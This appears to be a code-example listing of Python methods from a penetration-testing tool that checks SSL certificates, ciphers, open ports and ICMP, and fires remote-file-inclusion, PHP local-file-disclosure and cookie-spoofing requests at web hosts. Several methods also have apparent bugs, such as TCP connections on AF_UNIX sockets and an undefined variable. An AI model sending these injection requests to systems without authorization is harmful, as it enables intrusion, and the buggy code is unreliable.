Exemple #1
0
    def ConnectionTest(self, host, port):
        global PrintLog  # Global functor for PrintLog.

        PrintLog(
            "Attempting to establish connection to {0}:{1}".format(host, port),
            "Debug")
        bSuccess = False

        try:
            lSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            lSock.connect((host, port))
            lSock.close()

            # Success!
            self.m_result = self.SEC_SUCCESS
            self.m_testResults['connection'] = self.SEC_SUCCESS
            bSuccess = True

            PrintLog(
                "Successfully connected to {0}:{1}: PASS".format(host, port),
                "Success")
        except (IOError, OSError, socket.error, TypeError, ValueError) as err:
            self.m_result = self.SEC_FAILURE
            self.m_testResults['connection'] = self.SEC_FAILURE

            PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                     "Fatal")

        return bSuccess
Exemple #2
0
    def _Util_GetHeaders(self, location, host, useSSL=False):
        global PrintLog  # Global functor for PrintLog

        htHeaders = "HEAD {0} HTTP/1.1\r\nHost: {1}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n".format(
            location, host)

        mData = ""
        if htHeaders != "":
            if useSSL == True:
                try:
                    sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                    sslContext.options |= ssl.OP_NO_SSLv2
                    sslContext.options |= ssl.OP_NO_SSLv3
                    sslContext.load_default_certs()
                    sslContext.verify_mode = ssl.CERT_REQUIRED
                    sslContext.check_hostname = True

                    sslConn = sslContext.wrap_socket(socket.socket(
                        socket.AF_INET, socket.SOCK_STREAM),
                                                     server_hostname=host)
                    sslConn.connect((host, 443))

                    sslConn.sendall(htHeaders)

                    lOldSz = 0
                    lNewSz = 1
                    while (lNewSz - lOldSz) > 0:
                        lOldSz = lNewSz
                        mData += sslConn.recv(65535)
                        lNewSz = len(mData) - lOldSz

                    sslConn.close()

                except (IOError, OSError, socket.error, ssl.SSLError) as err:
                    PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                             "Fatal")
                    sys.exit(255)
            else:
                try:
                    httpSock = socket.socket(socket.AF_UNIX,
                                             socket.SOCK_STREAM)
                    httpSock.connect((host, 80))

                    httpSock.sendall(htHeaders)

                    lOldSz = 0
                    lNewSz = 1
                    while (lNewSz - lOldSz) > 0:
                        lOldSz = lNewSz
                        mData += httpSock.recv(65535)
                        lNewSz = len(mData) - lOldSz

                    httpSock.close()
                except (IOError, OSError, socket.error, ssl.SSLError) as err:
                    PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                             "Fatal")
                    sys.exit(255)

        return mData.split("\r\n")
Exemple #3
0
    def TestSSLValid(self, host, port=443):
        PrintLog("Test SSL validation for {0}...".format(host), "Debug")
        bSuccess = False

        try:
            if self.m_lastCrt == None or 0 == len(self.m_lastCrt):
                sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                sslContext.options |= ssl.OP_NO_SSLv2
                sslContext.options |= ssl.OP_NO_SSLv3
                sslContext.load_default_certs()
                sslContext.verify_mode = ssl.CERT_REQUIRED
                sslContext.check_hostname = True

                sslConn = sslContext.wrap_socket(socket.socket(
                    socket.AF_INET, socket.SOCK_STREAM),
                                                 server_hostname=host)
                sslConn.connect((host, port))

                # Get the certificate.
                self.m_lastCrt = sslConn.getpeercert()
                sslConn.close()

            # Get the current date.
            epochStamp = dt.now().strftime("%s")

            sslNotBefore = dt.strptime(self.m_lastCrt['notBefore'],
                                       '%b %d %H:%M:%S %Y %Z').strftime("%s")
            sslNotAfter = dt.strptime(self.m_lastCrt['notAfter'],
                                      '%b %d %H:%M:%S %Y %Z').strftime("%s")

            # Test the version.
            if epochStamp > sslNotBefore and epochStamp < sslNotAfter:
                PrintLog("SSL is Valid: PASS!", "Success")
                self.m_result = self.SEC_SUCCESS
                self.m_testResults['valid'] = self.SEC_SUCCESS
                bSuccess = True

                if self.m_lastHost == "" or self.m_lastHost == None:
                    self.m_lastHost = host
            else:
                PrintLog("SSL is Invalid/Expired: FAIL!", "Failure")
                self.m_testResults['valid'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None

        except (IOError, OSError, socket.error, ssl.SSLError) as err:
            if type(err) == ssl.SSLError or type(err) == socket.error:
                PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
                self.m_testResults['connection'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None
            else:
                PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                         "Fatal")
                sys.exit(255)

        return bSuccess
Exemple #4
0
    def TestSSLHash(self, host, port=443):
        PrintLog("Test if SSL has weak signature for {0}...".format(host),
                 "Debug")
        bSuccess = False

        try:
            sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            sslContext.options |= ssl.OP_NO_SSLv2
            sslContext.options |= ssl.OP_NO_SSLv3
            sslContext.load_default_certs()
            sslContext.verify_mode = ssl.CERT_REQUIRED
            sslContext.check_hostname = True

            sslConn = sslContext.wrap_socket(socket.socket(
                socket.AF_INET, socket.SOCK_STREAM),
                                             server_hostname=host)
            sslConn.connect((host, port))

            # Check to see if the SSL has a strong signature or not.
            x509Cert = cryptography.x509.load_der_x509_certificate(
                sslConn.getpeercert(True),
                cryptography.hazmat.backends.openssl.backend)
            sslConn.close()

            if x509Cert.signature_hash_algorithm.name != "MD5" and x509Cert.signature_hash_algorithm.name != "SHA1":
                PrintLog("SSL has strong hash in signature: PASS!", "Success")
                self.m_result = self.SEC_SUCCESS
                self.m_testResults['weak-sign'] = self.SEC_SUCCESS
                bSuccess = True

                if self.m_lastHost == "" or self.m_lastHost == None:
                    self.m_lastHost = host
            else:
                PrintLog("SSL has weak hash in signature: FAIL!", "Failure")
                self.m_testResults['weak-sign'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None

        except (IOError, OSError, socket.error, ssl.SSLError) as err:
            if type(err) == ssl.SSLError or type(err) == socket.error:
                PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
                self.m_testResults['connection'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None
            else:
                PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                         "Fatal")
                sys.exit(255)

        return bSuccess
Exemple #5
0
    def TestSSLSelfSign(self, host, port=443):
        PrintLog("Test if SSL is self-signed for {0}...".format(host), "Debug")
        bSuccess = False

        try:
            sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            sslContext.options |= ssl.OP_NO_SSLv2
            sslContext.options |= ssl.OP_NO_SSLv3
            sslContext.load_default_certs()
            sslContext.verify_mode = ssl.CERT_REQUIRED
            sslContext.check_hostname = True

            sslConn = sslContext.wrap_socket(socket.socket(
                socket.AF_INET, socket.SOCK_STREAM),
                                             server_hostname=host)
            sslConn.connect((host, port))

            # Get the certificate.
            self.m_lastCrt = sslConn.getpeercert()
            sslConn.close()

            # Check to see if the SSL is self-signed or not.
            if self.m_lastCrt['issuer'] != self.m_lastCrt[
                    'subject'] and 1 <= len(sslContext.get_ca_certs()):
                PrintLog("SSL is not self-signed: PASS!", "Success")
                self.m_result = self.SEC_SUCCESS
                self.m_testResults['self-signed'] = self.SEC_SUCCESS
                bSuccess = True

                if self.m_lastHost == "" or self.m_lastHost == None:
                    self.m_lastHost = host
            else:
                PrintLog("SSL is self-signed: FAIL!", "Failure")
                self.m_testResults['self-signed'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None

        except (IOError, OSError, socket.error, ssl.SSLError) as err:
            if type(err) == ssl.SSLError or type(err) == socket.error:
                PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
                self.m_testResults['connection'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None
            else:
                PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                         "Fatal")
                sys.exit(255)

        return bSuccess
Exemple #6
0
    def InjectRemoteInclude(self,
                            host,
                            uri="/login",
                            method="get",
                            variable="username"):
        global PrintLog  # Global functor for PrintLog

        bSuccess = False

        # Perform a pre-request for testing.
        lPrePage = self._Util_RetrievePage(host, uri="/index.php")

        # Format the request.
        htRequest = ""
        htValue = "{0}://{1}/{2}".format(self.m_evilProto, self.m_evilUrl,
                                         self.m_remoteInclude)

        if method == "post":
            htRequest = "{0} {1} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n{2}={3}\r\n".format(
                method.upper(), uri, variable, htValue, host)
        else:
            htRequest = "{0} {1}?{2}={3} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n".format(
                method.upper(), uri, variable, htValue, host)

        if 200 != self._Util_SendRequest(htRequest, host, useSSL=True)[0]:
            PrintLog("Site rejected injection: PASS!", "Success")
            self.m_result = self.SEC_SUCCESS
            self.m_testResults['remote_include'] = self.SEC_SUCCESS
            bSuccess = True
        else:
            PrintLog(
                "Site has accepted request, testing to see if it had an effect.",
                "Debug")
            lPostPage = self._Util_RetrievePage(host, uri="/index.php")

            if lPrePage == lPostPage:
                PrintLog("Site rejected include code injection: PASS!",
                         "Success")
                self.m_result = self.SEC_SUCCESS
                self.m_testResults['remote_include'] = self.SEC_SUCCESS
                bSuccess = True
            else:
                PrintLog("Site accepted and RAN include code injection: FAIL!",
                         "Failure")
                self.m_result = self.SEC_FAILURE
                self.m_testResults['remote_include'] = self.SEC_FAILURE

        return bSuccess
Exemple #7
0
    def __init__(self, proto="ftp"):
        global PrintLog  # Global functor for PrintLog

        self.m_evilProto = proto

        self.m_result = self.SEC_UNTESTED
        self.m_testResults['remote_include'] = self.SEC_UNTESTED

        PrintLog("PHP Exploit tester ready.", "Info")
Exemple #8
0
    def DiscloseLocalFile(self,
                          host,
                          uri="/login",
                          method="get",
                          variable="username",
                          file_path="file_get_contents('app.php') ?>"):
        global PrintLog  # Global functor for PrintLog

        bSuccess = False

        htRequest = ""
        if method == "post":
            htRequest = "{0} {1} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n{2}={3}\r\n".format(
                method.upper(), uri, variable, file_path, host)
        else:
            htRequest = "{0} {1}?{2}={3} HTTP/1.1\r\nHost: {4}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n\r\n".format(
                method.upper(), uri, variable, file_path, host)

        lStatus, lHTML = self._Util_SendRequest(htRequest, host, useSSL=True)

        if 200 != lStatus:
            PrintLog("Site rejected injection: PASS!", "Success")
            self.m_result = self.SEC_SUCCESS
            self.m_testResults['local_disclosure'] = self.SEC_SUCCESS
            bSuccess = True
        else:
            PrintLog(
                "Site has accepted request, testing to see if it had an effect.",
                "Debug")

            if not re.match('^<\?php.*', lHTML, re.IGNORECASE):
                PrintLog("Site rejected disclosure injection: PASS!",
                         "Success")
                self.m_result = self.SEC_SUCCESS
                self.m_testResults['local_disclosure'] = self.SEC_SUCCESS
                bSuccess = True
            else:
                PrintLog("Site accepted and RAN disclosure injection: FAIL!",
                         "Failure")
                self.m_result = self.SEC_FAILURE
                self.m_testResults['local_disclosure'] = self.SEC_FAILURE

        return bSuccess
Exemple #9
0
    def TestSSLCiphers(self, host, port=443):
        PrintLog("Test for weak ciphers on {0}...".format(host), "Debug")
        bSuccess = False

        try:
            sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            sslContext.options |= ssl.OP_NO_SSLv2
            sslContext.options |= ssl.OP_NO_SSLv3
            sslContext.load_default_certs()
            sslContext.verify_mode = ssl.CERT_REQUIRED
            sslContext.check_hostname = True

            # Some weak ass ciphers.
            weakAssCiphers = "aNULL:MD5:DSS:RC4:SHA1:!HIGH"
            sslContext.set_ciphers(weakAssCiphers)

            sslConn = sslContext.wrap_socket(socket.socket(
                socket.AF_INET, socket.SOCK_STREAM),
                                             server_hostname=host)
            sslConn.connect((host, port))
            sslConn.close()

            PrintLog("SSL ciphers are weak: FAIL! ({0})".format(err),
                     "Failure")
            self.m_testResults['weak-cipher'] = self.SEC_FAILURE
            self.m_lastHost = ""
            self.m_lastCrt = None

        except (IOError, OSError, socket.error, ssl.SSLError) as err:
            if type(err) == ssl.SSLError:
                PrintLog("SSL ciphers are strong: PASS!", "Success")
                self.m_result = self.SEC_SUCCESS
                self.m_testResults['weak-cipher'] = self.SEC_SUCCESS
                bSuccess = True

                if self.m_lastHost == "" or self.m_lastHost == None:
                    self.m_lastHost = host
            else:
                PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                         "Fatal")
                sys.exit(255)

        return bSuccess
Exemple #10
0
    def __init__(self):
        global PrintLog  # Global functor for PrintLog.

        # Setup the defaults.
        self.m_result = self.SEC_UNTESTED
        self.m_testResults = {
            'connection': self.SEC_UNTESTED,
            'port': self.SEC_UNTESTED,
            'icmp': self.SEC_UNTESTED
        }

        PrintLog("Network Pen-Tester ready.", "Info")
Exemple #11
0
    def TestSSLConnection(self, host, port=443):
        PrintLog(
            "Attempting to test SSL connection to {0}:{1}...".format(
                host, port), "Debug")
        bSuccess = False

        try:
            sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            sslContext.options |= ssl.OP_NO_SSLv2
            sslContext.options |= ssl.OP_NO_SSLv3
            sslContext.load_default_certs()
            sslContext.verify_mode = ssl.CERT_REQUIRED
            sslContext.check_hostname = True

            sslConn = sslContext.wrap_socket(socket.socket(
                socket.AF_INET, socket.SOCK_STREAM),
                                             server_hostname=host)
            sslConn.connect((host, port))
            sslConn.close()

            PrintLog("SSL Connection: PASS!", "Success")
            bSuccess = True

            self.m_result = self.SEC_SUCCESS
            self.m_testResults['connection'] = self.SEC_SUCCESS
            self.m_lastHost = host

        except (IOError, OSError, socket.error, ssl.SSLError) as err:
            if type(err) == ssl.SSLError or type(err) == socket.error:
                PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
                self.m_testResults['connection'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None
            else:
                PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                         "Fatal")
                sys.exit(255)

        return bSuccess
Exemple #12
0
    def TestSSLVersion(self, host, port=443):
        PrintLog("Test SSL version for {0}...".format(host), "Debug")
        bSuccess = False

        try:
            if self.m_lastCrt == None or 0 == len(self.m_lastCrt):
                sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                sslContext.options |= ssl.OP_NO_SSLv2
                sslContext.options |= ssl.OP_NO_SSLv3
                sslContext.load_default_certs()
                sslContext.verify_mode = ssl.CERT_REQUIRED
                sslContext.check_hostname = True

                sslConn = sslContext.wrap_socket(socket.socket(
                    socket.AF_INET, socket.SOCK_STREAM),
                                                 server_hostname=host)
                sslConn.connect((host, port))

                # Get the certificate.
                self.m_lastCrt = sslConn.getpeercert()
                sslVer = sslConn.version()
                sslConn.close()

            # Test the version.
            if self.m_lastCrt['version'] >= 2 and sslVer != "SSLv3":
                PrintLog("SSL Version is >=2: PASS!", "Success")
                self.m_result = self.SEC_SUCCESS
                self.m_testResults['version'] = self.SEC_SUCCESS
                self.m_testResults['SSLv3'] = self.SEC_SUCCESS
                bSuccess = True

                if self.m_lastHost == "" or self.m_lastHost == None:
                    self.m_lastHost = host
            else:
                PrintLog("SSL Version is <2: FAIL!", "Failure")
                self.m_testResults['version'] = self.SEC_FAILURE
                self.m_testResults['SSLv3'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None

        except (IOError, OSError, socket.error, ssl.SSLError, KeyError) as err:
            if type(err) == ssl.SSLError or type(err) == socket.error:
                PrintLog("SSL Connection: FAIL! ({0})".format(err), "Failure")
                self.m_testResults['connection'] = self.SEC_FAILURE
                self.m_lastHost = ""
                self.m_lastCrt = None
            elif type(err) == KeyError:
                PrintLog(
                    "Unable to find key {0}! Check debug for more info!".
                    format(err), "Critical", "{0}".format(self.m_lastCrt))
                sys.exit(2)
            else:
                PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                         "Fatal")
                sys.exit(255)

        return bSuccess
Exemple #13
0
    def __init__(self):
        global PrintLog  # Global functor for PrintLog.

        # Setup the defaults.
        self.m_result = self.SEC_UNTESTED
        self.m_testResults = {
            'connection': self.SEC_UNTESTED,
            'version': self.SEC_UNTESTED,
            'self-signed': self.SEC_UNTESTED,
            'valid': self.SEC_UNTESTED,
            'weak-cipher': self.SEC_UNTESTED,
            'SSLv3': self.SEC_UNTESTED,
            'key-size': self.SEC_UNTESTED,
            'weak-sign': self.SEC_UNTESTED
        }

        PrintLog("SSL Pen-Tester ready.", "Info")
Exemple #14
0
    def IcmpTest(self, host):
        global PrintLog  # Global functor for PrintLog.

        if sys.version_info[0] < 3:
            PrintLog("Checking for ICMP echo...", "Debug")
            bSuccess = False

            try:
                icmpResp = pyping.ping(host)

                if None != icmpResp.max_rtt:
                    PrintLog("ICMP responding!", "Failure")
                    self.m_result = self.SEC_FAILURE
                    self.m_testResults['icmp'] = self.SEC_FAILURE
                else:
                    PrintLog("ICMP dropped: PASS!", "Success")
                    self.m_result = self.SEC_SUCCESS
                    self.m_testResults['icmp'] = self.SEC_SUCCESS
                    bSuccess = True
            except (IOError, OSError, socket.error, TypeError,
                    ValueError) as err:
                if type(err) == socket.error or type(err) == socket.timeout:
                    PrintLog("ICMP not available!", "Failure")
                    self.m_result = self.SEC_FAILURE
                    self.m_testResults['icmp'] = self.SEC_FAILURE
                else:
                    PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                             "Fatal")
                    sys.exit(255)
        else:
            PrintLog(
                "Version of Python (python>=3) doesn't suppot PyPing! Assuming OK (please check manually)",
                "Success")
            self.m_result = self.SEC_SUCCESS
            self.m_testResults['icmp'] = self.SEC_SUCCESS
            bSuccess = True

        return bSuccess
Exemple #15
0
    def SpoofCookies(self, host, uri="/login", secure_uri="admin"):
        global PrintLog  # Global functor for PrintLog

        bSuccess = False

        # Grab the headers of the URI.
        lHeaders = self._Util_GetHeaders(uri, host, useSSL=True)
        lCookies = ""

        htRequest = "GET {0} HTTP/1.1\r\nHost: {1}\r\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:59.0) Gecko/20100101 Firefox/59.0\r\nConnection: keep-alive\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\n".format(
            secure_uri, host)

        for field in lHeaders:
            if re.match('^Cookie:\s(.*)$', field, re.IGNORECASE):
                lCookies = re.search('^Cookie:\s(.*)$', field,
                                     re.IGNORECASE).group(1)
                break

        if lCookies != "":
            lCookies = lCookies.split(";")

            # Scrape through the cookies and look for "login".
            for cookie in lCookies:
                lKey = cookie.split("=")[0]
                lValue = cookie.split("=")[1]

                if re.match('.*login.*', lKey, re.IGNORECASE):
                    # Inspect the value and attempt a spoof.
                    if re.match('^(0|1)$', lValue, re.IGNORECASE):
                        htRequest = "{0}Cookie: {1}={2};\r\n\r\n".format(
                            htRequest, lKey, "1")
                    elif re.match('^(t(rue)?|f(alse)?)$', lValue,
                                  re.IGNORECASE):
                        htRequest = "{0}Cookie: {1}={2};\r\n\r\n".format(
                            htRequest, lKey, "true")
                    else:
                        htRequest = ""

            if htRequest != "":
                # Attempt the query!
                if 200 != self._Util_SendRequest(htRequest, host,
                                                 useSSL=True)[0]:
                    PrintLog("Site rejected cookie spoof injection: PASS!",
                             "Success")
                    self.m_result = self.SEC_SUCCESS
                    self.m_testResults['remote_include'] = self.SEC_SUCCESS
                    bSuccess = True
                else:
                    PrintLog(
                        "Site accepted and RAN cookie spoof injection: FAIL!",
                        "Failure")
                    self.m_result = self.SEC_FAILURE
                    self.m_testResults['remote_include'] = self.SEC_FAILURE

        else:
            PrintLog(
                "Not able to test cookie spoofing as there are no cookies! Defaulting to SUCCESS",
                "Success")
            self.m_result = self.SEC_SUCCESS
            self.m_testResults['cookies'] = self.SEC_SUCCESS
            bSuccess = True

        return bSuccess
Exemple #16
0
    def PortTest(self,
                 host,
                 port_list=[443, 587, 993, 995, 8080],
                 full_range=False):
        global PrintLog  # Global functor for PrintLog.

        PrintLog("Scanning for unwanted ports...", "Debug")
        bSuccess = False

        try:
            if full_range == True:
                PrintLog("Scanning ALL 65,535 ports!", "Debug")
            else:
                PrintLog("Scanning ports {0}".format(port_list), "Debug")
                unwantedPorts = [25, 26, 80, 110, 143, 3306, 5432]

                for port in unwantedPorts:
                    if port in port_list:
                        PrintLog(
                            "Skipping potentially unsafe port: {0}".format(
                                port), "Warning")
                        continue
                    else:
                        # Scan this port.
                        try:
                            lSock = socket.socket(socket.AF_INET,
                                                  socket.SOCK_STREAM)
                            lSock.settimeout(1.0)
                            lSock.connect((host, port))
                            lSock.close()

                            PrintLog(
                                "Port {0} is open on {1}".format(port, host),
                                "Failure")
                            self.m_result = self.SEC_FAILURE
                            self.m_testResults['port'] = self.SEC_FAILURE

                            break
                        except (IOError, OSError, socket.error, socket.timeout,
                                TypeError, ValueError) as err:
                            if type(err) == socket.error or type(
                                    err) == socket.timeout:
                                PrintLog(
                                    "Port {0} is NOT open on {1}".format(
                                        port, host), "Success")
                            else:
                                PrintLog(
                                    "{0} \033[1;34m{1}\033[0m".format(
                                        err, type(err)), "Fatal")
                                sys.exit(255)

                if self.m_result != self.SEC_FAILURE and self.m_testResults[
                        'port'] != self.SEC_FAILURE:
                    PrintLog("Port scan complete: PASS!", "Success")
                    self.m_result = self.SEC_SUCCESS
                    self.m_testResults['port'] = self.SEC_SUCCESS
                    bSuccess = True

        except (IOError, OSError, socket.error, TypeError, ValueError) as err:
            self.m_result = self.SEC_FAILURE
            self.m_testResults['port'] = self.SEC_FAILURE

            PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                     "Fatal")

        return bSuccess
Exemple #17
0
    def _Util_SendRequest(self, headers, host, useSSL=False):
        global PrintLog  # Global functor for PrintLog

        lStatus = 404
        lHTML = ""

        mData = ""
        if headers != "":
            if useSSL == True:
                try:
                    sslContext = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
                    sslContext.options |= ssl.OP_NO_SSLv2
                    sslContext.options |= ssl.OP_NO_SSLv3
                    sslContext.load_default_certs()
                    sslContext.verify_mode = ssl.CERT_REQUIRED
                    sslContext.check_hostname = True

                    sslConn = sslContext.wrap_socket(socket.socket(
                        socket.AF_INET, socket.SOCK_STREAM),
                                                     server_hostname=host)
                    sslConn.connect((host, 443))

                    sslConn.sendall(headers)

                    lOldSz = 0
                    lNewSz = 1
                    while (lNewSz - lOldSz) > 0:
                        lOldSz = lNewSz
                        mData += sslConn.recv(65535)
                        lNewSz = len(mData) - lOldSz

                    sslConn.close()

                except (IOError, OSError, socket.error, ssl.SSLError) as err:
                    PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                             "Fatal")
                    sys.exit(255)
            else:
                try:
                    httpSock = socket.socket(socket.AF_UNIX,
                                             socket.SOCK_STREAM)
                    httpSock.connect((host, 80))

                    httpSock.sendall(headers)

                    lOldSz = 0
                    lNewSz = 1
                    while (lNewSz - lOldSz) > 0:
                        lOldSz = lNewSz
                        mData += httpSock.recv(65535)
                        lNewSz = len(mData) - lOldSz

                    httpSock.close()
                except (IOError, OSError, socket.error, ssl.SSLError) as err:
                    PrintLog("{0} \033[1;34m{1}\033[0m".format(err, type(err)),
                             "Fatal")
                    sys.exit(255)

            # Parse the data.
            if re.match('^HTTP\/[0-9]\.[0-9]\s([0-9]{3})\s.*', mData,
                        re.IGNORECASE):
                lRegExp = re.search(
                    '^HTTP\/[0-9]\.[0-9]\s([0-9]{3})\s.*\r\n\r\n(.*)$', mData)

                if lRegExp != None:
                    lStatus = lRegExp.group(1)
                    lHTML = lRegExp.group(2)
            else:
                PrintLog("Was unable to parse HTTP return!", "Critical")
                sys.exit(255)

        return (lStatus, lHTML)